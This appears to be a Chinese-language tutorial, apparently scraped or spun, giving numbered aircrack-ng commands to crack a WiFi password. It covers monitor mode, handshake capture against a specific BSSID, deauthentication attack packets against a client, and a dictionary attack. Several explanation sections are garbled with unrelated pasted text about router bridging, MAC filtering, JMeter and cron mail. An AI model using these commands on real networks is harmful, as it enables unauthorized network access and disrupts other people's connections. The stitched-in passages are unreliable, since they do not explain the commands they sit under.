?示例详细步骤及命令:
1.ifconfig
2.iwconfig
3.ifconfig wlan0 down
4.iwconfig wlan0 mode monitor
5.ifconfig wlan0 up
6.iwconfig
7.airmon-ng start wlan0
8.airodump-ng mon0
9.airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
10.aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
11.aircrack-ng -w /root/Desktop/zidian.txt test-01.cap
详细解说:
1:查看网卡
ifconfig
2:查看网卡工作模式
iwconfig
3:关闭网卡
示例命令:
ifconfig wlan0 down
命令部分注释如下:
ifconfig wlan0(选择网卡) down
4:更改网卡模式为monitor模式
示例命令:
iwconfig wlan0 mode monitor
命令部分注释如下:
iwconfig wlan0(选择网卡) mode monitor
5:启动网卡
示例命令:
ifconfig wlan0 up
命令部分注释如下:
ifconfig wlan0(选择网卡) up
6:查看网卡工作模式
iwconfig
7:启动airmon-ng开启网卡监听模式
示例命令:
airmon-ng start wlan0
命令部分注释如下:
airmon-ng start wlan0(选择网卡)
8:扫描无线网络
airodump-ng mon0
9:开始抓包
示例命令:
airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
命令部分注释如下:
在无线网络中通信的时候,我们抓包的时候可能会看到被抓取的包对应ap的mac地址是不存在的,其实抓包时ap的mac是bssid,它和实际标注的mac地址不一定一样(但是一般都差不多,也就是之后最后面的几位不一样)。勾选【开启wds】,在【(桥接的)ssid】中填写主路由器的ssid,在【(桥接的)bssid】中填写主路由器的无线mac地址,【密钥类型】选择wpa2-psk。l 启用无线: 如果启用无线,隐藏访问点,ssid,bssid,信道,54g?速率,多播速率,54g?模式,发送功率,将会显示出来。
10:发送流量攻击包
aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
命令部分注释如下:
2、如果有新的无线设备需要连接无线wifi上网,只需要先查看该无线设备的mac地址,并把这个mac地址添加到路由器上的“无线mac地址过滤”规则下面即可。查看无线mac地址,首先我们需要获取ap1和ap2这2台路由器的无线mac地址linux命令大全,注意:这里是获取的无线mac地址,不是lan或者wan口的mac地址。l 检查路由器是否设置无线mac地址过滤,使用网线连接路由器进入管理界面,打开无线设置—无线mac地址过滤查看,如果启用,可以关闭或者添加该无线网卡的mac地址。
11:若抓包失败,则运行该条命令,从8~10步开始执行(此步骤可不执行)
rm -r test-01.*
命令部分注释如下:
rm -r test(自己定义的网络抓包的名字)-0*(*为1—9的数字,例如:01、02、03等,自己定义的网络抓包的名字+0*.cap 即为握手包名).*
12:开始破解WIFI密码
${__stringfromfile(c:\users\root\desktop\apache-jmeter-2.9\test.txt,,,)}。01 * * * * test mail -s test test < /home/test/test/test.txt。[root@localhostsamba]# echo "this is test" > /opt/test/test.txt。
命令部分注释如下:
aircrack-ng -w /root/Desktop/zidian.txt(字典存放的完整路径) test(自己定义的网络抓包的名字)-0*(*为1—9的数字,按tab键会显示出来linux命令大全,若不出来,则用ls查看已抓到的握手包是哪个).cap(自己定义的网络抓包的名字+0*.cap)